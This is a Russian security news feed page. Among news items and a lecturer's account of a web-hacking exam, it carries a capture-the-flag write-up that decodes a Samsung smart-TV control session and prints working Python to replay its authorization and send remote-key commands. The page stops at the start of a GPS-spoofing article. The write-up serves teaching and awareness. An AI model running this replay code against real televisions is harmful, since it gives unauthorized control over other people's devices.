Новости мира информационной безопасности. Расследование и реагирование на инциденты. Кибербезопасность.

[ Цифровая криминалистика | Реагирование на инциденты ]

Новости информационной безопасности

IT & 
Security NewsFeed

Следующие 100 записей

Mozilla оценила безопасность и приватность интернета

В своем первом отчете о здоровье интернета НКО Mozilla Foundation предупреждает о таких угрозах приватности, как монополизация рынка интернет-услуг, правительственная слежка и рост армии подключенных к интернету устройств.

Опубликованный на прошлой неделе Internet Health Report является частью более широкой программы по отслеживанию состояния интернета по таким направлениям, как открытые инновации, децентрализация, приватность и безопасность, а также веб-грамотность. Этот 40-страничный документ, как пишет редактор Солана Ларсен (Solana Larsen), призван задать точку отсчета для прогнозирования дальнейших изменений во всемирной паутине.

«Мы готовы работать с частными лицами и организациями, которых волнует благополучие интернета, с тем, чтобы вовлечь широкие массы в движение за ‘здоровый интернет’ и привнести в эту область термины вроде ‘глобального потепления’, которыми ранее оперировали лишь борцы за защиту окружающей среды», – говорит Ларсен.

В отчете, который Mozilla позиционирует как пробную оценку здоровья интернета, рассмотрены как многочисленные достижения на настоящий момент, так и вызовы. В нем с удовлетворением отмечены текущие тренды в криптографии, в том числе успехи альянса Let’s Encrypt и сервис-провайдеров вроде WhatsApp в деле повышения защищенности интернет-соединений.

Mozilla - Internet Health

Тем не менее, предстоит еще много работы в обеспечение приватности и безопасности. «Общественное внимание к законодательству о слежке возросло, однако это не остановило стремление Великобритании, Пакистана, Франции и некоторых других стран к расширению полномочий правительства в этой области», – пишут авторы Internet Health Report.

Mozilla также предупреждает о том, что, расширяя присутствие в интернете потребительских и корпоративных IoT-устройств, нельзя забывать о защите пользователей от потенциальных попыток слежки и злонамеренных взломов. «В ноябре 2016 года вредоносная программа, именуемая Mirai, мобилизовала 100 тыс. подключенных к интернету устройств, в том числе веб-камеры и детские мониторы, для проведения DDoS-атак, которые кратковременно вывели из строя некоторые части интернета, – сказано в отчете. – Владельцы этих скомпрометированных устройств могли и не знать о случившемся (или не интересоваться этим), и производство дешевых и ненадежных устройств будет продолжаться до тех пор, пока не получат распространение стандарты безопасности, правила и меры отчетности».

Призыв Mozilla к активным действиям продиктован необходимостью создать мотивацию для потребителей и организации, которые должны требовать от компаний, чтобы те учитывали аспекты безопасности и приватности на стадии разработки устройств.

«Помимо прочего, нам также следует более ответственно относиться к тому, какой информацией мы делимся добровольно, – пишут авторы отчета. – Будет ли когда-нибудь удален профиль на сайте знакомств, которым последний раз пользовались шесть лет назад? Как долго отслеживает вас онлайн-реклама, которую вы просматриваете? Даже если вас вдруг заинтересуют условия приватности онлайн-платформы, они далеко не всегда доступны на английском языке».

Ларсен назвала этот пробный отчет «open-source» инициативой. По ее словам, целью в данном случае является работа с многочисленной аудиторией союзников и «представление результатов существующих исследований интернета в ходе четкого и целенаправленного изложения, заостряющего внимание на важных моментах и тенденциях в современной экосистеме интернета».

Mozilla - Internet Health 1

orig: 2017-01-23 16:28:37 / https://threatpost.ru/mozillas-first-internet-health-report-tackles-security-privacy/20216/ (click post title)



Symantec аннулирует ошибочно выданные сертификаты

Symantecinfo-icon отозвала многочисленные ошибочно выданные сертификаты, в том числе для таких доменов как example.com и test.com. Это уже не первый случай в истории компании.

Эти сертификаты были обнаружены экспертом Эндрю Айером (Andrew Ayer), основателем SSLMate. Он нашел несколько сертификатов, для доменов example.com, test.com, test1.com, test2.com, содержащих строку “test”.

Айер нашел более 100 ошибочно выданных сертификатов, относящихся к Symantec и ее дочерним компаниям GeoTrust и Thawte. Строка “test” намекает на то, что они были выпущены в целях тестирования.

Стивен Медин (Steven Medin), менеджер Symantec, говорит, что сертификаты выданы одним из проверенных партнеров WebTrust. Он утверждает, что привилегии этого партнера были ограничены, чтобы ограничить дальнейшее выдачу сертификатов, а сами сертификаты аннулированы.

Исследователь посоветовал владельцам доменов использовать Certificate Transparency (CT) для того, чтобы определить, являются ли выданные им сертификаты недействительными.

orig: 2017-01-23 15:45:03 / https://www.anti-malware.ru/news/2017-01-23/21924 (click post title)



Опрос среди читателей SecurityLab.ru

Уважаемые посетители сайта!

Редакция SecurityLab.ru просит вас ответить на следующие вопросы, касающиеся работы портала и ежедневно публикуемых материалов.

Мы хотим выпускать качественный и интересный контент, а для этого нам важно знать мнение каждого посетителя сайта.

Спасибо!

orig: 2017-01-23 15:20:44 / http://www.securitylab.ru/news/485105.php (click post title)



Облакотека обеспечила миграцию онлайн-сервисов компании «Юмакс»

ООО «Юмакс» обратились к услугам компании Облакотека с целью обеспечить соблюдение требований законодательства по трансграничной обработке персональных данных, а также из-за необходимости проведения финансовых расчетов в российском денежном эквиваленте, что было невозможно при использовании облака amazon.com.

В результате сотрудничества на платформу Облакотеки мигрировал ресурс Maximumtest.ru, который является визитной карточкой и общей точкой входа для клиентов компании «Юмакс», а также онлайн-сервис Propostuplenie.ru, использующийся для организации образовательных форумов «Навигатор поступления» в нескольких городах России. Портал является точкой входа для всех российских вузов, желающих принять участие в форуме, а также для тех, кто хочет посетить выставку.

Для организации миграции на площадке Облакотеки был предварительно развернут виртуальный сервер на базе Ubuntu 14.04, установлен и настроен web-сервер Apache и СУБД MySQL. После подготовки сервера была залита и протестирована сама web-часть ресурса. Финалом работы был перенос базы данных старого ресурса на новый сервер и изменение записи DNS, ведущей на новый адрес сайта.

Максим Захаренко, генеральный директор Облакотеки: «Юмакс» выбрала площадку Облакотеки, так как она полностью подходила по всем необходимым параметрам. Мы очень рады, что компания сделала выбор именно в нашу сторону, и надеемся на долгое плодотворное сотрудничество. 

orig: 2017-01-23 12:37:42 / http://www.iso27000.ru/press-relizy/oblakoteka-obespechila-migraciyu-onlain-servisov-kompanii-yumaks (click post title)



Oracle в апреле перестанет доверять JAR-файлам, подписанным с MD5

Oracleinfo-icon решила дать разработчикам Java больше времени, чтобы убедиться, что их JAR-файлы не подписаны с помощью алгоритма MD5. Java Runtime Environment (JRE) больше не будет доверять этим типам файлов, подписанных MD5 начиная с апреля 2017 года.

Компания в октябре объявила о том, что планирует прекратить доверять JAR-файлам, подписанным с использованием алгоритма MD5, в котором, как известно, некоторые уязвимости (например, к коллизионной атаке) существуют  на протяжении более десяти лет.

Начиная с версии Java SE 8u131, которую компания планирует выпустить в апреле, JAR-файлы, подписанные с использованием MD5 будут рассматриваться как неподписанные. Изначально Oracle планировала перестать доверять алгоритму MD5 в январе 2017 года, но некоторые разработчики запросили дополнительное время, чтобы подготовиться к этому.

Oracle посоветовала разработчикам проверить, подписаны ли их JAR-файлы с использованием MD5 и если да, повторно подписать их с более сильным алгоритмом. Чтобы удалить существующие подписи MD5 в утилите Zip можно использовать следующую команду:

zip -d test.jar 'META-INF/*.SF' 'META-INF/*.RSAinfo-icon' 'META-INF/*.DSA'

«Если вы не сами подписывали, либо создавали JAR-файлы, которые вы используете, вам необходимо обратиться непосредственно к их разработчику. Если разработчик не может выяснить с использованием какого алгоритма он подписывал свои файлы (если подписывал), то рекомендуется повторно подписать их, используя более современный алгоритм» - объясняет сотрудник Oracle, Эрик Костлоу (Erik Costlow).

orig: 2017-01-23 12:34:39 / https://www.anti-malware.ru/news/2017-01-23/21923 (click post title)



Symantec отозвала ряд ошибочных SSL-сертификатов

Некоторые сертификаты подключались к домену example.com, а в других содержалось слово test.

Компания Symantec была вынуждена отозвать ряд цифровых сертификатов. Причиной послужило обнаружение исследователем безопасности множества подозрительных сертификатов.

Как сообщил в субботу, 21 января, менеджер по продукции Symantec Стив Медин (Steve Medin), спорные сертификаты были выпущены одним из партнеров компании. В целях предотвратить дальнейший выпуск, Symantec на время ограничила привилегии данного партнера.

Ранее основатель SSLMate Эндрю Айер (Andrew Ayer) обнаружил около ста SSL-сертификатов, предположительно выпущенных Symantec по ошибке и нарушающих принцип работы браузера. Некоторые сертификаты подключались к домену example.com, а в других содержалось слово test.

Как сообщил Айер изданию Ars Technica, поскольку Chrome не проверяет незамедлительно на предмет отзыва сертификатов, они по-прежнему могут использоваться в атаках. Кроме того, злоумышленники могут препятствовать подключению браузера к отозвавшему сертификаты серверу.

Напомним, в 2015 году Symantec оказалась в центре скандала, когда ее дочерняя компания Thawte выпустила поддельные сертификаты для нескольких доменов Google. Проблема возникла во время внутреннего тестирования, и ответственные за ошибку сотрудники компании были уволены.

orig: 2017-01-23 12:15:47 / http://www.securitylab.ru/news/485104.php (click post title)



Около 200 тыс. систем по-прежнему уязвимы к Heartbleed

В Российской Федерации насчитывается 6673 уязвимых сервера.

С момента обнаружения опасной уязвимости в OpenSSL, получившей название Heartbleed, прошло уже более двух с половиной лет, однако многие организации до сих пор не удосужились установить обновления. По данным поисковой системы Shodan, уязвимость по-прежнему остается неисправленной более чем на 199 500 системах.

Обнаруженная в апреле 2014 года Heartbleed (CVE-2014-0160) представляет собой серьезную проблему безопасности в реализации расширения TLS/DTLS, позволяющую злоумышленникам раскрыть содержимое памяти на сервере. В настоящее время порядка 200 тыс. серверов все еще уязвимы и представляют угрозу конфиденциальности хранящихся на них данных. Больше всего уязвимых систем насчитывается в США (42032 сервера), Южной Корее (15380 серверов), Китае (14116 серверов) и Германии (14072 сервера). Россия занимает в списке шестое место (6673 сервера).

Лидерами среди организаций, так и не установивших обновления, являются Broadband, Amazon.com и Verizon. Около 75 000 уязвимых серверов используют истекшие SSL-сертификаты.

orig: 2017-01-23 11:24:28 / http://www.securitylab.ru/news/485103.php (click post title)



Экзамен для будущих «русских хакеров» в Московском Политехе

И снова здравствуйте. Обычно я пишу статьи в качестве разработчика, но сегодня хочется поделиться опытом проведения экзамена по информационной безопасности в Московском Политехе. По-моему получилось довольно интересно. Задание даже может быть полезным начинающим тестировщикам и пентестерам. Но вначале я немного расскажу про то, как проходили занятия в течении семестра — чтобы было понятно, как мы дошли до жизни такой.


Лекции
В течении семестра у меня было по две пары занятий в неделю для каждой группы, и в это время я постарался впихнуть максимум информации для расширения кругозора. На лекциях рассказывал разное:


И ещё многое другое. На самом деле, я отлично понимаю, что студенты забывают три четверти полученной информации, а оставшаяся четверть к моменту выпуска становится неактуальной.

Поэтому самым важным для меня было донести до студентов, что:

  • Сейчас почти любой чайник может быть атакован хакером;
  • Нельзя доверять никому, ничему и никогда. Ни пользователям, ни железу, ни софту.
  • Хороший разработчик, хороший хакер и специалист по безопасности — три качества, которые не могут не сосуществовать;
  • Текущие вычислительные мощности позволяют совершать жуткие вещи;
  • Ломать — не строить. Это и интересно и уметь нужно;
  • Тёмная сторона может быть привлекательной. Но там печенек гораздо меньше, чем на светлой — а вот отхватить от джедаев можно по полной.

Семинары
С учётом того, что времени на семинарах было заметно меньше, чем хотелось бы (да, этот предмет я готов вести хоть несколько лет — тема очень глубокая), пришлось выбирать какую-то конкретику, которой студенты будут заниматься в максимально прикладном характере, чтобы их представление о хакинге несколько отличалось от фильмов с красивыми бегущими зелёными строчками. При этом мне хотелось максимально рассмотреть именно способы атаки, а не варианты защиты. Наиболее интересно мне показалось рассмотреть атаки на веб приложения. Они наглядны, эффектны, и многие из используемых там принципов можно так же применить на мобильные и даже десктопные приложения. Поскольку студенты в прошлом семестре изучали PHP, то рассматривали эти уязвимости в PHP — с оговоркой на то, что практически всё то же самое справедливо для других языков разработки.

В целом лабораторные были такие:


Полные задания лабораторных можно посмотреть тут — выкладка на github pages быстра, удобна, и позволяет быстро исправлять какие-то найденные в задании косяки. Студент нажал F5 — и вот у него уже новая версия задания! Для особо вредных читателей — сразу признаюсь, что местами там идёт копирование википедии. Можно было бы давать ссылки — но там часто попадаются прекрасные вещи вроде этой. Так что приходится переписывать материалы руками. И то периодически студенты находили в интернете всякие нетривиальные решения…
Для экзамена было заготовлено специальное уязвимое веб приложение (ссылка есть в конце поста). Изначально у меня было желание заготовить дополнительных уязвимостей в самой машине (устаревшее ПО, открытые порты сервисов с простыми паролями и так далее), но решил, что на это не хватит времени — поэтому ломали только непосредственно само приложение.
Перечислять лишний раз уязвимости не буду, поскольку там было ровно то, что мы проходили на лабораторных работах. Заранее предупреждаю — там некачественный код! Тонны его! В этом и был смысл.

Забавный алгоритм мы придумали для оценки студентов. Для экзамена использовался формат bug bounty, и поэтому каждая уязвимость стоила там некоторую сумму вознаграждения. Всё как во взрослом настоящем мире. И экзамен нужно было купить… Отличная оценка стоила 20.000 долларов, удовлетворительная 12.000. Можно наличными.

Если кому интересно, то сама виртуалка была поднята на vagrant+virtualbox, в качестве ОС там был CentOS 7, из ПО стоял nginx+mariadb+php-fpm плюс несколько расширений. Так же на экзамене можно было пользоваться заготовленным стандартным образом Kali Linux 2016.2 — аналогичный тому, который мы использовали на лабораторных работах.

Экзамен длился пять часов (мы практикуем формат WorldSkills). Он прошёл без всяких неожиданностей — всё работало, всё (что нужно) ломалось, все студенты, которые ходили на пары, сдали. Кто не ходили — увы. По-моему, так и должно быть.


После экзамена я запилил вот такой анонимный опросник — гугл формы просто божественны для быстрого сбора фидбека. Если интересно, можете прокликать — я специально экспортировал себе результаты опроса студентов и оставил форму открытой. Приятно было получить 13 ответов — при общем количестве студентов в 30 человек и отсутствию обязаловки по заполнению это просто отличный результат. Так же очень обрадовало, что ребятам понравился курс, и отзывы по большей части позитивные. Хвалить себя здесь я смысла не вижу, так что остановимся на критике (авторская орфография сохранена):
Крайне мало информативности по лабам на лекциях.
Да, есть такое дело. Мне хотелось максимум всего интересного рассказать на лекциях, а лабораторками заниматься на семинарах. Но, видимо, надо им тоже уделять время лекций.
Мало времени выделено в течении семестра на лекции.
Да, у нас было по паре лекций в неделю. Приятно, что ребята увидели, что можно было рассказать ещё очень много всего. Ну что же — может быть, мы ещё встретимся в магистратуре.
Отсутствие проектора на первых лекциях.
Да, аудиторию с проектором я получил не сразу. С ним выходит гораздо нагляднее.
Kali и LInux в целом надо бы показать людям более подробно.
Да, тут проблема в том, что курса по Linux до этого не было. Надо будет скорректировать последовательность курсов.
Было трудно приходить на лекции так рано.
Мне тоже :)
В качестве улучшения, я бы предложил(а) добавить в курс интеректива. Например блиц опросы, тесты на лекциях (гуглить kahoot). Это бы увеличило вовлечённость студентов и дало бы понимание кто и где плавает.
Отличная идея. В следующий раз сделаем.
Видео с ютуба
Да, проблема с наглядными материалами была. Причём с видео на русском вообще проблема серьёзная. Его нет, а то, что есть, настолько чудовищно… И дикция куда хуже моей, и часто возникают ситуации, когда автор совершает ошибку, после чего в течении 10 минут её ищет и откатывается обратно… А на заднем фоне в это время играет «Владимирский централ» и фишки домино стучат. В общем, нужны очень крепкие нервы, чтобы это смотреть. А писать своё видео с нуля это весьма трудозатратно. Так что в результате я или использовал видео материалы Positive Technologies (очень люблю этих ребят!), или ставил английское видео и озвучивал его. В следующий раз нужно будет или записать самостоятельно, или хотя бы наложить свою озвучку. Но надо будет искать человека на это, поскольку моя дикция хромает. В общем, задача есть, сложная, но подъёмная.
Трудно слушать речи с недочетами в дикции, а также стоило бы говорить погромче, дальше 2-й парты часто просто было неслышно.

Да, есть такое. Рад, что это заметил только один студент (ну или просто остальные избыточно вежливы). Буду стараться исправляться и использовать микрофон для усиления звука. Громко говорить две-три пары подряд просто горла не хватает — и так на работу потом приходил без голоса.
Неприменимая теория, которую я забуду через пару месяцев.
Увы, так со всей теорией. Но я надеюсь, что ребята запомнили основные мысли (см. выше). Ну и такие вещи умеют всплывать в памяти, если вы продолжаете ими заниматься.
Письменный материал, который в курсе не особо был полезен.
Тут, видимо, имелось в виду, что не особо полезен для экзамена. Увы, теорию в экзамен положить не удалось. Буду думать, как лучше связать курс.
Люди боятся подходить и спрашивать(проблема глобальная и видимо не лечится с годами и курсами), надо как-то придумать подход к ним, чтобы студенты сами приходили и интересовались как что делать, если совсем не понимают. Ничего предлагать не стану, просто это надо как-то обдумать.
Да, проблема есть, и она очень серьёзная. У первого курса, который курирую по проектам микроэлектроники, всё ещё хуже. Ребята просто не умеют спрашивать (хотя тут есть интереснее разделение по половому признаку — девушки охотнее задают вопросы). Постараюсь исправить большим количеством обратной связи — в том числе тестами, опросами и так далее. Убедить ребят задавать вопросы безумно сложно.

Так же многие студенты указали на то, что хотелось бы иметь больше времени на экзамен. Надо думать. ИМХО, 6-8 часов работать головой почти нереально — возможно, надо сокращать программу экзамена, чтобы лучше уложиться в 4-5 часов. Или действительно делать перерыв.

Ещё ребята писали, что была несовершенная система оценки уязвимостей — были небольшие награды за небольшие уязвимости, а за большие можно было получить сразу треть нужной награды. С одной стороны, большие уязвимости мной так и задумывались — их мало кто найдёт, но если уж найдёт — это вознаградится по полной. С другой стороны, явно было нужно больше маленьких уязвимостей. Есть над чем поработать.

Итоги
В целом я доволен, хотя предстоит ещё много работы по доработке курса. Радует то, что теперь есть костяк, на который уже легче наращивать больше вкусного “мяса”. И хорошо, что первый блин — не комом. А дальше будет больше, интереснее и вкуснее!

Буду рад фидбеку от аудитории хабра. Прямо сейчас вы можете повлиять на будущее российского образования и на то, какие соискатели придут к вам через несколько лет.

P.S. Ищу сейчас хорошего QA-инженера в свою команду. Принимаю резюме с отчётами по данному приложению ;)

P.S.2. Вы можете позвать меня читать какой-то курс у вас. Но должно быть социально-полезно, интересно, или за деньги (лучше, конечно, все три). А то постоянно приходят предложения от всяких милых компаний — придумайте и прочитайте нам курс за несколько рублей, с вас все материалы, видео, методички, и курс остаётся в нашей собственности… Мне страшно думать, кто для них пишет материалы, и чему такие курсы обучают студентов.

Благодарности
Без этих людей такого экзамена не было бы. Так что благодарности:
Ссылки

orig: 2017-01-23 11:05:35 / https://habrahabr.ru/post/320210/ (click post title)



Эй, телевизор, ты что, самый «умный»?

Про опасности использования «умных» телевизоров слышали, наверное, все. Говорят, что они наблюдают за владельцем и прослушивают его разговоры. Но это не тревожит большинство пользователей, которые продолжают спокойно заполнять формы авторизации прямо на экране TV.

Мы решили проверить, реально ли сделать что-то интересное с умным телевизором, не имея физического доступа к нему (спойлер: реально!), и готовы рассказать об этом на примере разбора задания с NeoQUEST!

Исходные данные
Участникам нужно было вывести на экран телевизора определенную картинку. Всё, что у них было — IP-адрес телевизора и дамп сессии, увеличивающей громкость телевизора. Физический доступ к телевизору был закрыт (в том числе ИК-порт), однако при этом участники могли видеть все, что появляется на экране.Разбираем дамп сессии
Адрес управляющего компьютера — 10.0.20.130, а адрес телевизора — 10.0.20.105. Содержимое дампа сетевого трафика выглядит следующим образом:

Отбросим все служебные пакеты, не несущие смысловой нагрузки. Остается 4 пакета:

С полной структурой пакетов можно ознакомиться по ссылке, мы же рассмотрим наиболее интересные поля.

Итак, первый пакет, который посылает управляющий компьютер, выглядит следующим образом:

0000   00 0c 00 6e 65 6f 71 75   65 73 74 2e 61 70 70 38  ...neoqu est.app8
0010   00 64 00 10 00 54 47 56   6e 61 58 51 67 56 58 4e  .d...TGV naXQgVXN
0020   6c 63 67 3d 3d 10 00 54   6d 39 46 59 58 4e 35 56  lcg==..T m9FYXN5V
0030   32 46 35 54 33 56 30 10   00 54 47 56 6e 61 58 51  2F5T3V0. .TGVnaXQ
0040   67 56 58 4e 6c 63 67 3d   3d                       gVXNlcg= =    

Здесь:

Очевидно, что это пакет авторизации. Второй пакет содержит информацию об успешности авторизации:

0000   00 0c 00 69 61 70 70 2e   73 61 6d 73 75 6e 67 04  ...iapp. samsung.
0010   00 64 00 01 00                                     .d...            

Смысл строки «iapp.samsung» неизвестен, а вот последние 4 байта (64 00 01 00) означают, что авторизация прошла успешно и дальше можно посылать управляющие команды.

Третий пакет является управляющим:

0000   00 0c 00 6e 65 6f 71 75   65 73 74 2e 61 70 70 11  ...neoqu est.app.
0010   00 00 00 00 0c 00 53 30   56 5a 58 31 5a 50 54 46  ......S0 VZX1ZPTF
0020   56 51                                              VQ               

По аналогии, последняя строка (S0VZX1ZPTFVQ) — это команда, закодированная в base64, после декодирования которой получается строка «KEY_VOLUP», увеличивающая громкость телевизора (VOLume UP).

Рассматриваем последний пакет: в его последних четырёх байтах хранятся нули, что указывает на успешное выполнение команды:

0000   00 0c 00 69 61 70 70 2e   73 61 6d 73 75 6e 67 04  ...iapp. samsung.
0010   00 00 00 00 00                                     .....            
Воспроизводим сессию
Первое, что хочется сделать после разбора дампа – попробовать повторно воспроизвести сессию. Для этого пишем небольшой код:
import socket
from base64 import b64encode

tv_ip = "10.0.20.101"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((tv_ip, 55000))

#----Authorization--------
msg = b'\x00\x0c\x00'+b'neoquest.app'+b'\x38\x00\x64\x00\x10\x00'+\
      b64encode(b'Legit User')+b'\x10\x00'+b64encode(b'NoEasyWayOut')+\
      b'\x10\x00'+b64encode(b'Legit User')
sock.sendall(msg)
print(sock.recv(1024))

#----Command--------------
msg = b'\x00\x0c\x00'+b'neoquest.app'+b'\x11\x00\x00\x00\x00\x0c\x00'+\
      b64encode(b'KEY_VOLUP')
sock.sendall(msg)
print(sock.recv(1024))

sock.close()

Запускаем …

Отлично! Телевизор увеличил свою громкость на 1, а это значит, что нам удалось успешно авторизоваться и выполнить команду. На этом завершилась первая часть задания. Едем дальше…

Выводим картинку на экран
Теперь нам каким-то образом нужно вывести картинку на экран. Зная, что подопытный телевизор — фирмы Samsung, и, немного погуглив, находим приложение Samsung SmartView, которое умеет посылать на телевизор картинку, не требуя при этом никакой нетривиальной настройки.

Алгоритм действий в данном случае будет примерно следующий:

  • Устанавливаем и запускаем SmartView на своем персональном компьютере.
  • Телевизор автоматически определился, пробуем подключиться.

    На экране телевизора появилось требование авторизовать наше устройство.

    Понимаем, что нам нужно выполнить команду нажатия на кнопку Enter для успешной авторизации. Находим в Интернете описание команд, откуда видим, что нам нужно выбрать «KEY_ENTER».

  • Запускаем наш код, заменив «KEY_VOLUP» на «KEY_ENTER».Измененный код
    import socket
    from base64 import b64encode
    
    tv_ip = "10.0.20.101"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((tv_ip, 55000))
    
    #----Authorization--------
    msg = b'\x00\x0c\x00'+b'neoquest.app'+b'\x38\x00\x64\x00\x10\x00'+\
          b64encode(b'Legit User')+b'\x10\x00'+b64encode(b'NoEasyWayOut')+\
          b'\x10\x00'+b64encode(b'Legit User')
    sock.sendall(msg)
    print(sock.recv(1024))
    
    #----Command--------------
    msg = b'\x00\x0c\x00'+b'neoquest.app'+b'\x11\x00\x00\x00\x00\x0c\x00'+\
          b64encode(b'KEY_ENTER')
    sock.sendall(msg)
    print(sock.recv(1024))
    
    sock.close()


  • SmartView успешно авторизован. Осталось выбрать нужную картинку и отправить ее на телевизор!
  • Неутешительные выводы
    Оказалось, что получить доступ к «умному» телевизору и управлять его громкостью и контентом, выводимым на экран, вполне реальная задача!

    Вспоминается зловещее предупреждение Евгения Касперского:

    Компьютеры заражаются, мобильные телефоны заражаются. Что будет следующее?… Я уверен, что следующий абсолютно новый вид атак будет на умные телевизоры. Все, что выходит в Интернет, все, что будет подключено к сети, рано или поздно будет «хакнуто».
    Что делать — идти к своему телевизору и закрывать ему доступ в Интернет? Или срочно приобретать/разрабатывать антивирус для «умных» телевизоров? Или садиться за компьютер и разрабатывать план мщения для недруга?

    Это личный выбор каждого. А мы лишь продемонстрировали одну из опасностей Интернета вещей. На этом мы не остановимся: впереди новый NeoQUEST и новые задания, демонстрирующие проблемы обеспечения безопасности современных технологий.

    orig: 2017-01-23 10:59:07 / https://habrahabr.ru/post/320188/ (click post title)



    Китай ужесточил контроль над VPN-сервисами

    C 22 января 2017 года все провайдеры, предоставляющие услуги VPN, должны получать государственную лицензию.

    Правительство КНР намерено усилить контроль за деятельностью VPN-сервисов, позволяющих пользователям получить доступ к интернет-контенту в обход цензуры «Золотого щита», передает издание South China Morning Post со ссылкой на сообщение Министерства промышленности и информационных технологий Китая.

    Согласно сообщению ведомства, в стране запущена программа по «очистке» китайского сегмента Сети, направленная на интернет-провайдеров, операторов дата-центров, а также сети доставки и распространения контента (Content Delivery Network, CDN). По новым правилам, начиная с 22 января 2017 года, все провайдеры, предоставляющие услуги виртуальных частных сетей, должны получать государственную лицензию. Кампания «по очистке» продлится до 31 марта 2018 года.

    Как поясняют в министерстве, китайский рынок доступа к услугам интернет-коммуникаций «демонстрирует признаки неупорядоченного развития и нуждается в срочном регулировании и управлении».

    По данным общественной организации GreatFire, отслеживающей факты блокировки интернет-ресурсов на территории КНР, в стране запрещен доступ к 135 из 1000 мировых сайтов-лидеров по посещаемости, в том числе Facebook, Twitter и YouTube.

    orig: 2017-01-23 10:46:54 / http://www.securitylab.ru/news/485102.php (click post title)



    Дайджест информационной безопасности № 104 за период с 27 декабря 2016 года по 23 января 2017 года

    Новости законодательства и отраслевого регулирования

    Новости ИБ Интересные посты русскоязычных блогов по ИБ Интересные посты англоязычных блогов по ИБ Исследования и аналитика Громкие инциденты ИБ Обзор событий предстоящих недель Посетить:

    26 января, Москва – Конференция «Регулирование криптовалют в России: промежуточные итоги».

    27-28 января, Смоленск  — 1-й межрегиональный форум по информационной безопасности «IT WALL».

    31 января, Москва — Бизнес-бранч «Код безопасности. Защита от киберугроз в бизнес-пространстве. Итоги года и прогнозы на 2017»

    31 января – 7 февраля, Москва – Неделя безопасного Рунета 2017

    2-3 февраля, Москва —  19-й Национальный форум информационной безопасности

    2 февраля, Волгоград – Конференция «Код информационной безопасности»

    Послушать:

    31 января, 12:00 – Вебинар InfoWatch «DLP 007: С МОБИЛЬНЫХ УСТРОЙСТВ ОБВИНЕНИЯ СНЯТЫ».

    Модуль: Аудит и Контроль

    Модуль предназначен для контроля, аудита и оценки соответствия организации различным нормативным и законодательным требованиям в области информационной безопасности.

    Модуль: Инциденты

    Модуль предназначен для организации процесса управления инцидентами информационной безопасности и анализа информации, относящейся к инциденту.

    С помощью модуля можно вести учет и регистрацию событий и инцидентов, хранить всю информацию по инцидентам и результатам их расследования в единой базе данных, а также подготавливать необходимую отчетность.

    Модуль: Риски

    Модуль предназначен для оценки и управления рисками информационной безопасности в соответствии с требованиями и рекомендациями российских и международных стандартов (ISO, OCTAVE, NIST, СТО БР, PCI DSS).

    С помощью модуля можно составить модель угроз, провести оценку и анализ рисков, сформировать план обработки рисков, оценить экономический эффект и обосновать бюджет на информационную безопасность.

    Модуль: Активы

    Модуль предназначен для организации управления ИТ-активами, сбора и визуализации детальной информации об ИТ-инфраструктуре и связях между элементами этой инфраструктуры, осуществления контроля за состоянием инфраструктуры.

    orig: 2017-01-23 10:25:22 / https://rvision.pro/blog-posts/digest-104/ (click post title)



    Ученые предложили использовать ЭКГ для шифрования данных

    ЭКГ станет отличным решением для медицинских устройств «Интернета вещей».

    Ученые Бингхэмптонского университета в Нью-Йорке предложили в качестве ключа шифрования для персональных данных использовать ритмы сердца. Подобно отпечаткам пальцев или рисунку радужной оболочки глаза электрокардиограмма (ЭКГ) каждого человека является уникальной. Поэтому можно создать систему, использующую как правило стабильную ЭКГ для шифрования и хранения данных, сообщает Bleeping Computer.

    Обеспечение надлежащего уровня энтропии при использовании привычных методов шифрования требует немалых вычислительных мощностей. Большинство домашних компьютеров и web-серверов могут справиться с подобными задачами, однако устройствам «Интернета вещей» (IoT) такие операции не под силу. Здесь на помощь может прийти система биометрической аутентификации, основанная на ЭКГ. По словам экспертов, она может стать незаменимой для «умных» медицинских устройств.

    Персональные данные каждого пациента буду незамедлительно шифроваться и управляться через центральный сервер хранения данных, как только будет получена его ЭКГ. Теоретически, такая мера должна защитить конфиденциальную информацию от посторонних, поскольку подделать уникальную электрокардиограмму очень сложно. Для расшифровки файлов врачу будет достаточно лишь на несколько секунд прикоснуться специальным датчиком к коже пациента.

    Несмотря не все преимущества аутентификации по ЭКГ, эксперты отмечают ряд недостатков данного метода. Во-первых, ритмы сердца человека могут изменяться с возрастом или в связи с перенесенной травмой или болезнью. Во-вторых, в случае смерти пациента получить доступ к его истории болезни уже будет нельзя. Также непонятно, что делать, если кому-нибудь все-таки удастся скопировать ЭКГ, ведь в отличие от текстового пароля изменить пульс невозможно.

    orig: 2017-01-23 10:19:31 / http://www.securitylab.ru/news/485101.php (click post title)



    Власти США выплатили $100 тыс. в рамках проекта Hack the Army

    За три недели действия программы организаторы получили свыше 400 отчетов об обнаруженных уязвимостях.

    Некоммерческая организация HackerOne обнародовала результаты проекта Hack the Army («Взломай Армию»), запущенного Минобороны США в ноябре прошлого года.

    За три недели действия программы по поиску уязвимостей на ресурсах Вооруженных сил США организаторы получили свыше 400 отчетов об обнаруженных уязвимостях, 118 из которых являлись «уникальными». В качестве награды за найденные проблемы исследователи в общей сложности получили порядка $100 тыс. Всего в программе принял участие 371 эксперт, в том числе 17 военнослужащих.

    В сообщении на платформе HackerOne Минобороны США раскрыло некоторые подробности о двух уязвимостях, обнаруженных на сайте goarmy.com. Совместная эксплуатация проблем позволила экспертам получить доступ к закрытым для публики разделам сайта, требующим авторизации.

    Напомним, в марте минувшего года Пентагон запустил аналогичную программу Hack the Pentagon в целях проверки кибербезопасности некоторых общественных сайтов Минобороны США. В рамках программы было обнаружено и исправлено 138 уязвимостей.

    orig: 2017-01-23 09:56:06 / http://www.securitylab.ru/news/485100.php (click post title)



    [Из песочницы] На сказочном Бали выпал снег или как же легко обмануть GPS

    image

    Добрый день, судя по фотографии, на Бали выпал снег! Как же так получилось?


    Плач

    В последнее время мне приходится заниматься проектированием и изготовлением спутниковых навигационных антенн, антенных решеток и радиоприемных устройств (РПУ). Здесь нужно заметить, что эти РПУ — это пребразователи навигационного сигнала к виду удобному для дальнейшей обработки, а не те навигационные приемники, которые выдают решение навигационной задачи и которые встроены в ваши гаджеты.

